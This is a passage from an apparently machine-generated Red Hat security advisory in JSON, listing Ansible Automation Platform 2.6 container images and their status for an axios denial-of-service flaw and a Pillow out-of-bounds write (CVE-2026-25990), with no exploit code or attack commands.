"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
